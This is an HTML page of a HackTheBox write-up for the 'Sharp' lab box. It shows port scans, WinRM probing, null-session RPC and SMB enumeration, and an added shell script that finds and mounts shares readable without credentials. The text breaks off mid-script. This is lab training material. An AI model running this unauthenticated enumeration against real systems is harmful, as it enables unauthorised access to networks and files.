<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<!-- iOS Safari -->
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
<!-- Chrome, Firefox OS and Opera Status Bar Color -->
<meta name="theme-color" content="#FFFFFF">
<link rel="stylesheet" type="text/css" href="https://cdnjs.cloudflare.com/ajax/libs/KaTeX/0.11.1/katex.min.css">
<link rel="stylesheet" type="text/css"
href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.19.0/themes/prism.min.css">
<link rel="stylesheet" type="text/css" href="css/SourceSansPro.css">
<link rel="stylesheet" type="text/css" href="css/theme.css">
<link rel="stylesheet" type="text/css" href="css/notablog.css">
<!-- Favicon -->
<link rel="shortcut icon" href="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Faf7d66d0-6402-4a6f-b9f5-00d2eb9e3482%2Fhackerman.gif?table=collection&id=92e319e1-0c5e-49c7-adc1-7d48fe74e022">
<style>
:root {
font-size: 20px;
}
</style>
<title>Sharp - HackTheBox Writeup (10.10.10.219) | samiko@127.0.0.1~$</title>
<meta property="og:type" content="blog">
<meta property="og:title" content="Sharp - HackTheBox Writeup (10.10.10.219)">
<meta name="description" content="Hard-difficulty Windows box with a focus on reverse engineering C# applications and enumerating SMB shares. Foothold gained by reversing the encryption in a Kanban application. Privilege escalation by abusing WCF server and client applications ported from .NET remoting.">
<meta property="og:description" content="Hard-difficulty Windows box with a focus on reverse engineering C# applications and enumerating SMB shares. Foothold gained by reversing the encryption in a Kanban application. Privilege escalation by abusing WCF server and client applications ported from .NET remoting.">
<meta property="og:image" content="https://www.hackthebox.eu/storage/avatars/2e0fd7a39dd00dcf9d0627019bee5c3d.png">
<style>
.DateTagBar {
margin-top: 1.0rem;
}
</style>
</head>
<body>
<nav class="Navbar">
<a href="/">
<div class="Navbar__Btn">
<span><img class="inline-img-icon" src="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Faf7d66d0-6402-4a6f-b9f5-00d2eb9e3482%2Fhackerman.gif?table=collection&id=92e319e1-0c5e-49c7-adc1-7d48fe74e022"></span>
<span>Home</span>
</div>
</a>
</nav>
<header class="Header">
<div class="Header__Spacer Header__Spacer--NoCover">
</div>
<div class="Header__Icon">
<span><img class="inline-img-icon" src="https://www.hackthebox.eu/storage/avatars/2e0fd7a39dd00dcf9d0627019bee5c3d.png"></span>
</div>
<h1 class="Header__Title">Sharp - HackTheBox Writeup (10.10.10.219)</h1>
<div class="DateTagBar">
<span class="DateTagBar__Item DateTagBar__Date">Posted on Mon, May 10, 2021</span>
<span class="DateTagBar__Item DateTagBar__Tag DateTagBar__Tag--red">
<a href="tag/Hard">Hard</a>
</span>
<span class="DateTagBar__Item DateTagBar__Tag DateTagBar__Tag--blue">
<a href="tag/Windows">Windows</a>
</span>
<span class="DateTagBar__Item DateTagBar__Tag DateTagBar__Tag--gray">
<a href="tag/Reversing">Reversing</a>
</span>
<span class="DateTagBar__Item DateTagBar__Tag DateTagBar__Tag--purple">
<a href="tag/SMB">SMB</a>
</span>
<span class="DateTagBar__Item DateTagBar__Tag DateTagBar__Tag--blue">
<a href="tag/.NET_Remoting">.NET Remoting</a>
</span>
</div>
<div>
Hard-difficulty Windows box with a focus on reverse engineering C# applications and enumerating SMB shares. Foothold gained by reversing the encryption in a Kanban application. Privilege escalation by abusing WCF server and client applications ported from .NET remoting.
</div>
</header>
<article id="https://www.notion.so/44be2b1639694d039f7966cee384b206" class="PageRoot PageRoot--FullWidth"><h2 id="https://www.notion.so/9e8fd2f3fc19443b8739f8252a976e76" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/9e8fd2f3fc19443b8739f8252a976e76"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">Recon</span></span></h2><ul class="BulletedListWrapper"><li id="https://www.notion.so/784038305b11493d909e873477116673" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Port scan:</span></span><div id="https://www.notion.so/3144107efe2d4aaca17dc349234951b6" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ nmap -p- 10.10.10.219 > ports.nmap</code></span></span></p></div><pre id="https://www.notion.so/84cedd3d27f64a22be97ebef03afb25e" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-04 17:09 ACDT
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.08 seconds</span></span></span></code></pre><div id="https://www.notion.so/8d51da7304aa4c468dbfdc90418f2d7b" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Scan failed, retrying with host discovery disabled.</span></span></p></div><div id="https://www.notion.so/3b06fa3623cb4940a5c0fc6de26cdc1c" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ nmap -p- 10.10.10.219 -Pn >> ports.nmap</code></span></span></p></div><pre id="https://www.notion.so/f63837dc29c34e819022cecf30e5fb28" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
5985/tcp open wsman
8888/tcp open sun-answerbook
8889/tcp open ddi-tcp-2</span></span></span></code></pre></li><li id="https://www.notion.so/0690b40daf1443deaafd8d086ebdcf6b" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Targeted scan:</span></span><div id="https://www.notion.so/be92f950dba84cfc92fc26f3b827627a" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ nmap -sC -sV -p 135,139,445,5985,8888,8889 10.10.10.219 -Pn > targeted.nmap</code></span></span></p></div><pre id="https://www.notion.so/841390627bbb4d0d994af0cdbae5033e" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8888/tcp open storagecraft-image StorageCraft Image Manager
8889/tcp open mc-nmf .NET Message Framing
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 24s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-01-04T06:47:38
|_ start_date: N/A</span></span></span></code></pre><div id="https://www.notion.so/efd226dc2e6f4bb6a0b86a91401b8106" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">RPC, SMB, HTTP/WinRM (?), StorageCraft Image Manager (?), .NET Message Framing.</span></span></p></div></li></ul><h2 id="https://www.notion.so/3edff4ae133747689ba7dc8c53fe5ff8" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/3edff4ae133747689ba7dc8c53fe5ff8"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">Enumeration</span></span></h2><div id="https://www.notion.so/97d55c7b35b6467da534eae4be146a57" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold">HTTP enumeration with netcat:</strong></span></span></p></div><ul class="BulletedListWrapper"><li id="https://www.notion.so/534cf05477904249a40217b5a5cbd0f0" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Connect to HTTP service:</span></span><div id="https://www.notion.so/e4f754003ca54e56bb98c35de0451850" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ nc 10.10.10.219 
5985</code></span></span></p></div><div id="https://www.notion.so/976e06ea4a6b439a8c470b65eb7d16aa" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">GET / HTTP/1.1</code></span></span></p></div><pre id="https://www.notion.so/7a4f34f4fc8e43bbb0af958f9fdecfd0" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>HTTP/1.1 400 Bad Request
Content-Type: text/html; charset=us-ascii
Server: Microsoft-HTTPAPI/2.0
Date: Mon, 04 Jan 2021 07:11:36 GMT
Connection: close
Content-Length: 334
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""</span></span><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="http://www.w3.org/TR/html4/strict.dtd"><span>http://www.w3.org/TR/html4/strict.dtd</span></a></span><span class="SemanticString"><span>">
<span class="token tag"><span class="token tag"><span class="token punctuation"><</span>HTML</span><span class="token punctuation">></span></span><span class="token tag"><span class="token tag"><span class="token punctuation"><</span>HEAD</span><span class="token punctuation">></span></span><span class="token tag"><span class="token tag"><span class="token punctuation"><</span>TITLE</span><span class="token punctuation">></span></span>Bad Request<span class="token tag"><span class="token tag"><span class="token punctuation"></</span>TITLE</span><span class="token punctuation">></span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation"><</span>META</span> <span class="token attr-name">HTTP-EQUIV</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>Content-Type<span class="token punctuation">"</span></span> <span class="token attr-name">Content</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>text/html; charset=us-ascii<span class="token punctuation">"</span></span><span class="token punctuation">></span></span><span class="token tag"><span class="token tag"><span class="token punctuation"></</span>HEAD</span><span class="token punctuation">></span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation"><</span>BODY</span><span class="token punctuation">></span></span><span class="token tag"><span class="token tag"><span class="token punctuation"><</span>h2</span><span class="token punctuation">></span></span>Bad Request - Invalid Hostname<span class="token tag"><span class="token tag"><span class="token punctuation"></</span>h2</span><span class="token punctuation">></span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation"><</span>hr</span><span class="token punctuation">></span></span><span class="token tag"><span class="token tag"><span class="token punctuation"><</span>p</span><span class="token punctuation">></span></span>HTTP Error 400. The request hostname is invalid.<span class="token tag"><span class="token tag"><span class="token punctuation"></</span>p</span><span class="token punctuation">></span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation"></</span>BODY</span><span class="token punctuation">></span></span><span class="token tag"><span class="token tag"><span class="token punctuation"></</span>HTML</span><span class="token punctuation">></span></span></span></span></span></code></pre></li><li id="https://www.notion.so/73893af9178a4920b01593bc49269ba3" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">HTTP.sys rejects an HTTP/1.1 request that carries no Host header (400, "Invalid Hostname"). Retry with a Host of "sharp.htb", adding the name to </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">/etc/hosts</code></span><span class="SemanticString"> for the tools that will need it:</span></span><div id="https://www.notion.so/3d30116c36a042e5b12e62c85ce0cbdb" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ nc 10.10.10.219 5985</code></span></span></p></div><div id="https://www.notion.so/e459882187fd4248b607c0fdc065eb62" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">GET / HTTP/1.1</code></span></span></p></div><div id="https://www.notion.so/10cb048041874054b76f7a04ea25901f" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">Host: sharp.htb</code></span></span></p></div><pre id="https://www.notion.so/002ad663daeb42a48114187a2b6aef7b" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>HTTP/1.1 404 Not Found
Content-Type: text/html; charset=us-ascii
Server: Microsoft-HTTPAPI/2.0
Date: Mon, 04 Jan 2021 07:18:17 GMT
Connection: close
Content-Length: 315
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""</span></span><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="http://www.w3.org/TR/html4/strict.dtd"><span>http://www.w3.org/TR/html4/strict.dtd</span></a></span><span class="SemanticString"><span>">
<span class="token tag"><span class="token tag"><span class="token punctuation"><</span>HTML</span><span class="token punctuation">></span></span><span class="token tag"><span class="token tag"><span class="token punctuation"><</span>HEAD</span><span class="token punctuation">></span></span><span class="token tag"><span class="token tag"><span class="token punctuation"><</span>TITLE</span><span class="token punctuation">></span></span>Not Found<span class="token tag"><span class="token tag"><span class="token punctuation"></</span>TITLE</span><span class="token punctuation">></span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation"><</span>META</span> <span class="token attr-name">HTTP-EQUIV</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>Content-Type<span class="token punctuation">"</span></span> <span class="token attr-name">Content</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>text/html; charset=us-ascii<span class="token punctuation">"</span></span><span class="token punctuation">></span></span><span class="token tag"><span class="token tag"><span class="token punctuation"></</span>HEAD</span><span class="token punctuation">></span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation"><</span>BODY</span><span class="token punctuation">></span></span><span class="token tag"><span class="token tag"><span class="token punctuation"><</span>h2</span><span class="token punctuation">></span></span>Not Found<span class="token tag"><span class="token tag"><span class="token punctuation"></</span>h2</span><span class="token punctuation">></span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation"><</span>hr</span><span class="token punctuation">></span></span><span class="token tag"><span class="token tag"><span class="token punctuation"><</span>p</span><span class="token punctuation">></span></span>HTTP Error 404. The requested resource is not found.<span class="token tag"><span class="token tag"><span class="token punctuation"></</span>p</span><span class="token punctuation">></span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation"></</span>BODY</span><span class="token punctuation">></span></span><span class="token tag"><span class="token tag"><span class="token punctuation"></</span>HTML</span><span class="token punctuation">></span></span></span></span></span></code></pre></li><li id="https://www.notion.so/021c083c2a4d4cb7b09a9f832a1e0f8c" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Voila, we can make a request! Let's see if /wsman exists:</span></span><div id="https://www.notion.so/64bcd12f4e4641b0bbeab60807d1ce43" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ nc 10.10.10.219 5985</code></span></span></p></div><div id="https://www.notion.so/1589d522f2e34aaa9e5d811f858f9832" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">POST /wsman HTTP/1.1</code></span></span></p></div><div id="https://www.notion.so/2af14fd09c9a41789e5f0fb437377c54" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">Host: sharp.htb</code></span></span></p></div><pre id="https://www.notion.so/a64e2a243b7745bdaf9a6299f9579fc8" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>HTTP/1.1 411 Length Required
Content-Type: text/html; charset=us-ascii
Server: Microsoft-HTTPAPI/2.0
Date: Mon, 04 Jan 2021 07:58:25 GMT
Connection: close
Content-Length: 344
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""</span></span><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="http://www.w3.org/TR/html4/strict.dtd"><span>http://www.w3.org/TR/html4/strict.dtd</span></a></span><span class="SemanticString"><span>">
<span class="token tag"><span class="token tag"><span class="token punctuation"><</span>HTML</span><span class="token punctuation">></span></span><span class="token tag"><span class="token tag"><span class="token punctuation"><</span>HEAD</span><span class="token punctuation">></span></span><span class="token tag"><span class="token tag"><span class="token punctuation"><</span>TITLE</span><span class="token punctuation">></span></span>Length Required<span class="token tag"><span class="token tag"><span class="token punctuation"></</span>TITLE</span><span class="token punctuation">></span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation"><</span>META</span> <span class="token attr-name">HTTP-EQUIV</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>Content-Type<span class="token punctuation">"</span></span> <span class="token attr-name">Content</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>text/html; charset=us-ascii<span class="token punctuation">"</span></span><span class="token punctuation">></span></span><span class="token tag"><span class="token tag"><span class="token punctuation"></</span>HEAD</span><span class="token punctuation">></span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation"><</span>BODY</span><span class="token punctuation">></span></span><span class="token tag"><span class="token tag"><span class="token punctuation"><</span>h2</span><span class="token punctuation">></span></span>Length Required<span class="token tag"><span class="token tag"><span class="token punctuation"></</span>h2</span><span class="token punctuation">></span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation"><</span>hr</span><span class="token punctuation">></span></span><span class="token tag"><span class="token tag"><span class="token punctuation"><</span>p</span><span class="token punctuation">></span></span>HTTP Error 411. The request must be chunked or have a content length.<span class="token tag"><span class="token tag"><span class="token punctuation"></</span>p</span><span class="token punctuation">></span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation"></</span>BODY</span><span class="token punctuation">></span></span><span class="token tag"><span class="token tag"><span class="token punctuation"></</span>HTML</span><span class="token punctuation">></span></span></span></span></span></code></pre></li><li id="https://www.notion.so/f2f49a4942264bb186681ac4c2424184" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">This response, the default WinRM port (5985) and the Microsoft-HTTPAPI/2.0 banner together make port 5985 the WinRM listener; WinRM requires valid credentials, so it becomes useful only once we have some.</span></span></li></ul><div id="https://www.notion.so/114d42a6a67d4688b4e0220a4fe9ba2c" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold">RPC enumeration with rpcclient:</strong></span></span></p></div><ul class="BulletedListWrapper"><li id="https://www.notion.so/ae9b0815748f437c9c1a1d70a5a7d21e" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Connect to MS-RPC with a null session (empty user, no password prompt):</span></span><div id="https://www.notion.so/337923ab7ffb4db5a13a99ea68162bc8" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ rpcclient 10.10.10.219 -U "" -N</code></span></span></p></div><pre id="https://www.notion.so/41fe7e48818c4830a09cc22f63b1287b" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>rpcclient $> _</span></span></span></code></pre></li><li id="https://www.notion.so/cfdc79d07ab24ce69d1d022011c4a2c6" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">The null session is accepted; query the basic server info:</span></span><div 
id="https://www.notion.so/f8190d74440b41efb803e10b5add68f7" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ srvinfo</code></span></span></p></div><pre id="https://www.notion.so/c4f21de6396f41e1b55bb4462f05d5e4" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>10.10.10.219 Wk Sv NT SNT
platform_id : 500
os version : 10.0
server type : 0x9003</span></span></span></code></pre></li><li id="https://www.notion.so/9565bb59382b42058055e06db3b7ab2d" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Other RPC queries are denied to the null session, so we move on.</span></span></li></ul><div id="https://www.notion.so/a82062d9bfee46b19118e40458b5a889" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold">SMB shares enumeration with smbclient:</strong></span></span></p></div><ul class="BulletedListWrapper"><li id="https://www.notion.so/abc1ffdb1edf41eda3dac804ad1daa00" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Listing shares as the guest account (empty password):</span></span><div id="https://www.notion.so/2b7d4cd977ae4580b00fa9112934f8f0" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ smbclient -L 10.10.10.219 -U guest%</code></span></span></p></div><pre id="https://www.notion.so/bb75a180aab745da8b04c3356f8d64cb" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>session setup failed: NT_STATUS_ACCOUNT_DISABLED</span></span></span></code></pre></li><li id="https://www.notion.so/c005b24d217a47a2824148a529662801" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">The guest account is disabled (NT_STATUS_ACCOUNT_DISABLED); try listing the shares with a null session instead:</span></span><div id="https://www.notion.so/2f5bd57ae0c14692bcfe5228540d6099" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ smbclient -L 10.10.10.219 
-N</code></span></span></p></div><pre id="https://www.notion.so/81b4569f53364528872a1e98b15e0bcb" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>Anonymous login successful
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
dev Disk
IPC$ IPC Remote IPC
kanban Disk
SMB1 disabled -- no workgroup available</span></span></span></code></pre></li><li id="https://www.notion.so/b6a444f3ccb944a48c039b85b4f3b5ed" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Found shares of interest: dev, kanban</span></span></li><li id="https://www.notion.so/cb2a1674f5524dde91072296d03d4dab" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Using </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">crackmapexec</code></span><span class="SemanticString"> to enumerate share permissions:</span></span><div id="https://www.notion.so/29ef9b48848c492bb0fcb1690df0c8e2" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ crackmapexec smb 10.10.10.219 -u '' -p '' --shares</code></span></span></p></div><pre id="https://www.notion.so/b0a45f57b6df476d8fe36aa79b862705" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>SMB 10.10.10.219 445 SHARP [*] Windows 10.0 Build 17763 x64 (name:SHARP) (domain:Sharp) (signing:False) (SMBv1:False)
SMB 10.10.10.219 445 SHARP [-] Sharp\: STATUS_ACCESS_DENIED
SMB 10.10.10.219 445 SHARP [+] Enumerated shares
SMB 10.10.10.219 445 SHARP Share Permissions Remark
SMB 10.10.10.219 445 SHARP ----- ----------- ------
SMB 10.10.10.219 445 SHARP ADMIN$ Remote Admin
SMB 10.10.10.219 445 SHARP C$ Default share
SMB 10.10.10.219 445 SHARP dev
SMB 10.10.10.219 445 SHARP IPC$ Remote IPC
SMB 10.10.10.219 445 SHARP kanban READ</span></span></span></code></pre></li><li id="https://www.notion.so/daf803135aa24bf2806a0c25e8efb931" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">The null session has READ on "kanban" (and on nothing else; "dev" is listed but grants no access), so let's mount it:</span></span><div id="https://www.notion.so/6a147cbb7bee45e6a8fbc5ee8c0be470" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ mkdir mnt</code></span></span></p></div><div id="https://www.notion.so/146447b90e76405589af856955050b63" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ sudo mount -t cifs -o username="",password="" //10.10.10.219/kanban ./mnt</code></span></span></p></div><pre id="https://www.notion.so/498a997eb4284cd3878dd5121cbe0b36" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>mount error(13): Permission denied</span></span></span></code></pre></li><li id="https://www.notion.so/7fe53a6e37f04ef7bdae6f76b73bc267" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">mount.cifs did not turn the empty username and password into a null session (the working mount below negotiates sec=none, which is the explicit null-user option). 
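</span></span><div class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">The null-session share checks of this section as one script, added here as an example (it is not code from the original post, nor anything found on the box): it lists shares with a null session, verifies read access per share with an actual directory listing instead of trusting the permissions column, and mounts the readable ones with the explicit null-user option of mount.cifs, <code class="SemanticString__Fragment SemanticString__Fragment--Code">sec=none</code>, rather than a credentials file. The target address, the mount root and the two parsers for the smbclient and crackmapexec table shapes are assumptions of the example; the sample outputs embedded at the bottom are constructed to match what this box returns.</span></span></p></div>

```shell
#!/bin/sh
# Added example, not part of the original writeup: the null-session share
# checks from this section (list shares, see which ones a null session can
# read, mount the readable ones) as one script.
# Assumptions: TARGET and MOUNT_ROOT are ours to choose; smbclient and
# mount.cifs are installed; sudo is available for the mount.
TARGET="${TARGET:-10.10.10.219}"
MOUNT_ROOT="${MOUNT_ROOT:-./mnt}"

# Share names from `smbclient -L` output: keep Disk shares only, drop the
# administrative ones (names ending in $), stop at the end of the table.
parse_shares() {
    printf '%s\n' "$1" | awk '
        /Sharename[[:space:]]+Type/ { in_table = 1; next }
        in_table {
            if (NF == 0) { in_table = 0; next }
            if ($2 == "Disk") { if ($1 !~ /[$]$/) print $1 }
        }'
}

# Share name and permission from `crackmapexec smb --shares` output;
# shares the null session cannot touch have no permission column at all.
parse_cme_perms() {
    printf '%s\n' "$1" | awk '
        $1 == "SMB" { if ($6 ~ /^(READ|WRITE|READ,WRITE)$/) print $5, $6 }'
}

list_shares() {
    # Null session: no user name, no password prompt.
    smbclient -L "$TARGET" -N 2>/dev/null
}

can_read() {
    # Returns 0 when a null session can list the root of share $1.
    smbclient "//$TARGET/$1" -N -c 'ls' >/dev/null 2>/dev/null
}

mount_null() {
    # sec=none is the explicit null-user option of mount.cifs; ro because
    # we only read the share here and copy files out before editing them.
    dir="$MOUNT_ROOT/$1"
    mkdir -p "$dir"
    sudo mount -t cifs -o sec=none,ro "//$TARGET/$1" "$dir"
}

enumerate() {
    listing=$(list_shares)
    for share in $(parse_shares "$listing"); do
        if can_read "$share"; then
            echo "[+] $share: readable by a null session, mounting at $MOUNT_ROOT/$share"
            mount_null "$share"
        else
            echo "[-] $share: access denied to a null session"
        fi
    done
}

# Constructed sample outputs, shaped like this box's smbclient and
# crackmapexec output, so the parsers can be exercised offline.
SAMPLE_SMBCLIENT='Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        dev             Disk
        IPC$            IPC       Remote IPC
        kanban          Disk
SMB1 disabled -- no workgroup available'

SAMPLE_CME='SMB  10.10.10.219  445  SHARP  [+] Enumerated shares
SMB  10.10.10.219  445  SHARP  Share    Permissions  Remark
SMB  10.10.10.219  445  SHARP  -----    -----------  ------
SMB  10.10.10.219  445  SHARP  ADMIN$                Remote Admin
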